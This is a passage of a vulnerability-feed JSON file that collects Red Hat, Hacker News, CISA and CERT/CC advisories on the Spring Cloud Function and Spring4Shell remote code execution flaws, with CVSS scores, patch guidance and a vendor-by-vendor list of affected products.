"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-07-21T20:35:36", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2023-04-06T09:43:13", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e100/java-spring-framework.jpg>)\n\nA zero-day remote code execution (RCE) vulnerability has come to light in the Spring framework shortly after a Chinese security researcher [briefly leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) a [proof-of-concept](<https://github.com/tweedge/springcore-0day-en>) (PoC) [exploit](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) on GitHub before deleting their account.\n\nAccording to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit ([JDK](<https://en.wikipedia.org/wiki/Java_Development_Kit>)) versions 9 and later and is a bypass for another vulnerability tracked as [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), enabling an unauthenticated attacker to execute arbitrary code on the target system.\n\nSpring is a [software framework](<https://en.wikipedia.org/wiki/Spring_Framework>) for building Java applications, including web apps on top of the Java EE (Enterprise Edition) platform.\n\n\"In certain configurations, exploitation of this issue is straightforward, as it only requires an attacker to send a crafted HTTP request to a vulnerable system,\" researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>). \"However, exploitation of different configurations will require the attacker to do additional research to find payloads that will be effective.\"\n\nAdditional details of the flaw, dubbed \"**SpringShell**\" and \"**Spring4Shell**,\" have been withheld to prevent exploitation attempts and until a fix is in place by the framework's maintainers, Spring.io, a subsidiary of VMware. It's also yet to be assigned a Common Vulnerabilities and Exposures (CVE) identifier.\n\nIt's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the application framework this week, including the Spring Framework expression DoS vulnerability ([CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>)) and the Spring Cloud expression resource access vulnerability ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg>)\n\nIn the interim, Praetorian researchers are recommending \"creating a ControllerAdvice component (which is a Spring component shared across Controllers) and adding dangerous patterns to the denylist.\"\n\nInitial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe. \"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous,\" Flashpoint [said](<https://www.flashpoint-intel.com/blog/what-is-springshell-what-we-know-about-the-springshell-vulnerability/>) in an independent analysis.\n\nDespite the public availability of PoC exploits, \"it's currently unclear which real-world applications use the vulnerable functionality,\" Rapid7 [explained](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). \"Configuration and JRE version may also be significant factors in exploitability and the likelihood of widespread exploitation.\"\n\nThe Retail and Hospitality Information Sharing and Analysis Center (ISAC) also [issued a statement](<https://www.rhisac.org/press-release/spring-framework-rce-vulnerability/>) that it has investigated and confirmed the \"validity\" of the PoC for the RCE flaw, adding it's \"continuing tests to confirm the validity of the PoC.\"\n\n\"The Spring4Shell exploit in the wild appears to work against the stock 'Handling Form Submission' sample code from spring.io,\" CERT/CC vulnerability analyst Will Dormann [said](<https://twitter.com/wdormann/status/1509372145394200579>) in a tweet. \"If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T05:52:00", "type": "thn", "title": "Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22950", "CVE-2022-22963"], "modified": "2022-03-31T15:27:03", "id": "THN:51196AEF32803B9BBB839D4CADBF5B38", "href": "https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-30T04:02:42", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgIeK3eJtR_et6MNbj0n-dcpg6m3XLALiJRPrhIA4yGOSfgFp4GFAJFR2Q3o31-tQcQpuVnc_WCTyR9yoih4dgeHa6orUrdUWCpDX1WWtymO1klV2EcDBa4OBds15BKHAGsEW3hPAVQ_HB772TkQVTfNrqyRvm5rY4qOkI7i3UarIAnOVC8LJfIZ0F3/s728-e100/CISA.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its [Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), including a high-severity security flaw affecting industrial automation software from Delta Electronics.\n\nThe issue, tracked as [CVE-2021-38406](<https://nvd.nist.gov/vuln/detail/CVE-2021-38406>) (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful exploitation of the flaw may lead to arbitrary code execution.\n\n\"Delta Electronics DOPSoft 2 lacks proper validation of user-supplied data when parsing specific project files (improper input validation) resulting in an out-of-bounds write that allows for code execution,\" CISA said in an alert.\n\nIt's worth noting that CVE-2021-38406 was originally disclosed as part of an industrial control systems (ICS) advisory [published](<https://www.cisa.gov/uscert/ics/advisories/icsa-21-252-02>) in September 2021.\n\nHowever, there are no patches that address the vulnerability, with CISA noting that the \"impacted product is end-of-life and should be disconnected if still in use.\" Federal Civilian Executive Branch (FCEB) agencies are mandated to follow the guideline by September 15, 2022.\n\nNot much information is available about the nature of the attacks that exploit the security bug, but a recent report from Palo Alto Networks Unit 42 [pointed out](<https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/>) instances of in-the-wild attacks leveraging the flaw between February and April 2022.\n\nThe development adds weight to the notion that adversaries are getting faster at exploiting newly published vulnerabilities when they are first disclosed, leading to indiscriminate and opportunistic scanning attempts that aim to take advantage of delayed patching.\n\nThese attacks often follow a specific sequence for exploitation that involves web shells, crypto miners, botnets, and remote access trojans (RATs), followed by initial access brokers (IABs) that then pave the way for ransomware.\n\nAmong other actively exploited flaws added to the list are as follows -\n\n * [**CVE-2022-26352**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26352>) \\- dotCMS Unrestricted Upload of File Vulnerability\n * [**CVE-2022-24706**](<https://nvd.nist.gov/vuln/detail/CVE-2022-24706>) \\- Apache CouchDB Insecure Default Initialization of Resource Vulnerability\n * [**CVE-2022-24112**](<https://nvd.nist.gov/vuln/detail/cve-2022-24112>) \\- Apache APISIX Authentication Bypass Vulnerability\n * [**CVE-2022-22963**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>) \\- VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability\n * [**CVE-2022-2294**](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>) \\- WebRTC Heap Buffer Overflow Vulnerability\n * [**CVE-2021-39226**](<https://nvd.nist.gov/vuln/detail/CVE-2021-39226>) \\- Grafana Authentication Bypass Vulnerability\n * [**CVE-2020-36193**](<https://nvd.nist.gov/vuln/detail/CVE-2020-36193>) \\- PEAR Archive_Tar Improper Link Resolution Vulnerability\n * [**CVE-2020-28949**](<https://nvd.nist.gov/vuln/detail/CVE-2020-28949>) \\- PEAR Archive_Tar Deserialization of Untrusted Data Vulnerability\n\n### iOS and macOS flaw added to the list\n\nAnother high-severity flaw added to the KEV Catalog is [**CVE-2021-31010**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31010>) (CVSS score: 7.5), a deserialization issue in Apple's Core Telephony component that could be leveraged to circumvent sandbox restrictions.\n\nThe tech giant addressed the shortcoming in iOS 12.5.5, iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 (and Security Update 2021-005 Catalina), and watchOS 7.6.2 released in September 2021.\n\nWhile there were no indications that the flaw was being exploited at the time, the tech giant appears to have silently revised its advisories on May 25, 2022 to add the vulnerability and confirm that it had indeed been abused in attacks.\n\n\"Apple was aware of a report that this issue may have been actively exploited at the time of release,\" the iPhone maker noted, crediting Citizen Lab and Google Project Zero for the discovery.\n\nThe September update is also notable for [remediating](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) CVE-2021-30858 and CVE-2021-30860, both of which were [employed by NSO Group](<https://thehackernews.com/2021/08/bahraini-activists-targeted-using-new.html>), the makers of the Pegasus spyware, to get around the operating systems' security features.\n\nThis raises the possibility that CVE-2021-31010 may have been stringed together with the aforementioned two flaws in an attack chain to escape the sandbox and achieve arbitrary code execution.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-29T04:23:00", "type": "thn", "title": "CISA Adds 10 New Known Actively Exploited Vulnerabilities to its Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28949", "CVE-2020-36193", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-31010", "CVE-2021-38406", "CVE-2021-39226", "CVE-2022-2294", "CVE-2022-22963", "CVE-2022-24112", "CVE-2022-24706", "CVE-2022-26352"], "modified": "2022-08-30T03:22:27", "id": "THN:5D50D5AA81EE14FA1044614364EAEBC6", "href": "https://thehackernews.com/2022/08/cisa-adds-10-new-known-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-07-22T11:15:11", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. Please see the [Spring Framework RCE Early Announcement](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by heige.\n\nThis document was written by Will Dormann\n\n### Vendor Information\n\n970766\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Blueriq __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.blueriq.com/en/insights/measures-cve22950-22963-22965>\n\n### BMC Software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=000395541>\n\n### Cisco __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is aware of the vulnerability identified by CVE ID CVE-2022-22950 and with the title \"Spring Expression DoS Vulnerability\". We are following our well-established process to investigate all aspects of the issue. If something is found that our customers need to be aware of and respond to, we will communicate via our established disclosure process.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>\n\n### Dell __ Affected\n\nUpdated: 2022-04-20 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms](<https://www.dell.com/support/home/en-us/drivers/driversdetails?driverid=0vdcg&oscode=naa&productcode=wyse-wms>)\n\n### JAMF software __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.jamf.com/t5/jamf-pro/spring4shell-vulnerability/td-p/262584>\n\n### NetApp __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20220401-0001/>\n\n### PTC __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search](<https://www.ptc.com/en/support/article/cs366379?language=en&posno=1&q=CVE-2022-22965&source=search>)\n\n### SAP SE __ Affected\n\nUpdated: 2022-04-13 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n\n### Siemens __ Affected\n\nUpdated: 2022-04-27 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf>\n\n### SolarWinds __ Affected\n\nNotified: 2022-04-02 Updated: 2022-04-06\n\n**Statement Date: April 04, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received any reports of these issues from SolarWinds customers but are actively investigating. The following SolarWinds product do utilize the Spring Framework, but have not yet been confirmed to be affected by this issue: \u2022 Security Event Manager (SEM) \u2022 Database Performance Analyzer (DPA) \u2022 Web Help Desk (WHD) While we have not seen or received reports of SolarWinds products affected by this issue, for the protection of their environments, SolarWinds strongly recommends all customers disconnect their public-facing (internet-facing) installations of these SolarWinds products (SEM, DPA, and WHD) from the internet.\n\n#### References\n\n * <https://www.solarwinds.com/trust-center/security-advisories/spring4shell>\n\n### Spring __ Affected\n\nNotified: 2022-03-31 Updated: 2022-03-31\n\n**Statement Date: March 31, 2022**\n\n**CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n### VMware __ Affected\n\nNotified: 2022-04-06 Updated: 2022-04-03 **CVE-2022-22965**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.vmware.com/security/advisories/VMSA-2022-0010.html>\n\n### Aruba Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 07, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAruba Networks is aware of the issue and we have published a security advisory for our products at https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-006.txt\n\n### Check Point __ Not Affected\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605&src=securityAlerts>)\n\n### Commvault __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://documentation.commvault.com/v11/essential/146231_security_vulnerability_and_reporting.html#cv2022041-spring-framework>\n\n### Elastic __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 